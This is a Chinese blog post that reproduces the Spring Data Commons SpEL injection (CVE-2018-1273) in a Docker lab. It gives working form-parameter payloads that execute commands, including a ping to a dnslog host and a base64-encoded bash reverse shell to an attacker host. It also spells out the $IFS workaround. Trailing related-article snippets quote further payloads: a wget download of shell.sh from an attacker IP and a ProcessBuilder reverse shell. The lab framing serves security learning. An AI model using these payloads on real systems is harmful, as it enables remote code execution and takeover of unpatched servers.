Spring Data Commons 远程命令执行(CVE-2018-1273)复现避坑

最新推荐文章于 2024-07-17 15:49:08 发布
最新推荐文章于 2024-07-17 15:49:08 发布
阅读量298 收藏 1
点赞数 1
文章标签: spring 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43749591/article/details/121097604
版权

漏洞简介:

Spring Data 是一个简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data 下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞。

影响版本:

Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 - 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)

复现操作:

使用docker环境 dockerfile地址:https://github.com/laoa1573/vuldockerfile

验证漏洞是否存在:

访问靶场的users目录

1635821629_6180a83df1788ff7b4d69.png!small?1635821626068

抓包后替换payload 执行命令ping dnslog:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping carlhf.dnslog.cn")]=&password=&repeatedPassword=

返回500状态,dnslog有回显说明命令执行成功:

1635822262_6180aab6a554599b483d0.png!small?1635822259090

1635822335_6180aaff416008ff8175b.png!small?1635822331287

现在来反弹shell,这里有个坑点是 Java Runtime.exe() 执行命令与反弹shell 要进行编码,java管道符无效的原因无法反弹,而且要使用IFS内部域分隔符,对空白处进行填充,不然也是反弹不回来的:

bash$IFS$9-i>&/dev/tcp/XXXXXX/port<&1

在bash 编码平台base64编码:java.lang.Runtime.exec() Payload Workarounds - @Jackson_T

1635822896_6180ad305cda1caebed01.png!small?1635822892539

替换paylaod、成功反弹shell:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCRJRlMkOS1pPiYvZGV2L3R2PCYx}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=

1635824487_6180b3678529812bbf8eb.png!small?1635824483542

weixin_43749591
关注
复现vulmap——CVE-2018-1273漏洞Spring Data Commons 远程命令执行
记录并分享学习安全的知识点..
01-16 853
一、漏洞介绍 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 二、影响版本 Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (I
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 2942
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
Spring Data Commons项目介绍
实践求真知
09-08 8612
一 点睛 Spring Data Commons有一个重要概念:Spring Data Repository抽象。使用Spring Data Repository可以极大地减少数据访问层的代码。既然是数据访问操作的统一标准,那肯定是定义了各种各样和数据访问相关的接口,下面来看看Spring Data Repository抽象的根接口是怎样定义的。 二 关键源码解读 1 Repository接...
Spring Data Commons
weixin_45594127的博客
11-27 2446
Spring data repository
spring 代码执行CVE-2018-1273
最新发布
qq_23003811的博客
07-17 325
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。5、打开vps服务器临时web服务器,这样就可以通过91.208.73.100:7777/shell.sh访问到我们制作好的文件。6、使用burp发送数据包,在被攻击的服务器上下载我们的shell。7、使用burp发送数据包,在被攻击的服务器上执行下载好的shell。4、在自己的vps服务器创一个shell.sh文件,内容为反弹连接。
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现
weixin_44023403的博客
03-27 825
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现前期准备一、漏洞复现二、总结 前期准备 工具:burpsuite、firefox浏览器 环境:kali 一、漏洞复现 (1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users,在注册页面提交任意信息,用burp抓包; 找到我们提交的数据,之后发送到repeater进行修改数据包; 构造payload,修改数据包,创建文件,进行发包测试;
Spring Data Commons远程命令执行漏洞复现CVE-2018-1273
wutiangui的博客
09-10 859
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273复现
klcyl_0106的博客
05-25 444
1.通过"docker-compose build"和"docker-compose up -d"拉取环境 刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker 2.访问服务器ip:8080/users看环境是否成功 3.注册时抓包,并修改成如下数据包: POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection:
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 688
CVE-2018-1273看漏洞分析
漏洞复现Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1346
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1710
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
spring-data-commons-1.8.6.RELEASE.jar
11-22
spring-data-commons-1.8.6.RELEASE.jar文档。欢迎下载
spring-data-commons.jar
08-25
学习spring data jpa的jar包,求分
spring-data-commons-1.12.11.RELEASE.jar 下载
09-12
spring-data-commons.jar spring-data-commons-core jar包下载 从 maven仓库中下载的官方jar包,放心使用
Spring Data JPA Spring Data Commons
03-31
本文档详细介绍了Spring data JPA的概念、Spring Data JPA能够做什么,Services和 Repositories的对比以及各种Repositories的使用方法。
spring-data-commons-1.6.2.RELEASE-sources.jar
10-22
spring-data-commons-1.6.2.RELEASE-sources.jar
Spring Data Commons - 参考文档
wcuu的博客
02-11 2867
Spring Data Commons 项目将核心 Spring 概念应用于使用许多关系和非关系数据存储的解决方案的开发。要定义存储库接口,您首先需要定义一个领域类特定的存储库接口。该接口必须扩展Repository并类型化为域类和 ID 类型。如果您想公开该域类型的 CRUD 方法,您可以扩展CrudRepository, 或其变体之一而不是Repository.您可以通过多种方式开始使用存储库界面。典型的方法是扩展CrudRepository,它为您提供了 CRUD 功能的方法。
Spring Data Commons主要梳理
热门推荐
机智猫
12-10 1万+
这篇文章是在看Spring Data Commons文档的时候梳理的内容,都是与Spring Data相关的,里面可能会涉及到Spring Data JPA的内容,但更多的是Commons的内容,Spring Data JPA只是一个具体的实现而已。 1. Spring Data 模块关系 Spring Data家族有多个模块: Spring Data JPA Spring Data Mongo...
001--什么是SpringData
weixin_42288943的博客
04-17 175
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
Spring Data Commons 2.0.0.M2: 提升项目元数据与Repository管理
Spring Data Commons 2.0.x_2.0.0.M2 是一个官方文档,主要针对 Spring Data Commons 的版本 2.0.0.M2 发布,由 Oliver Gierke、Thomas Darimont、Christoph Strobl、Mark Pollack 和 Thomas Risberg 等作者共同编撰...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值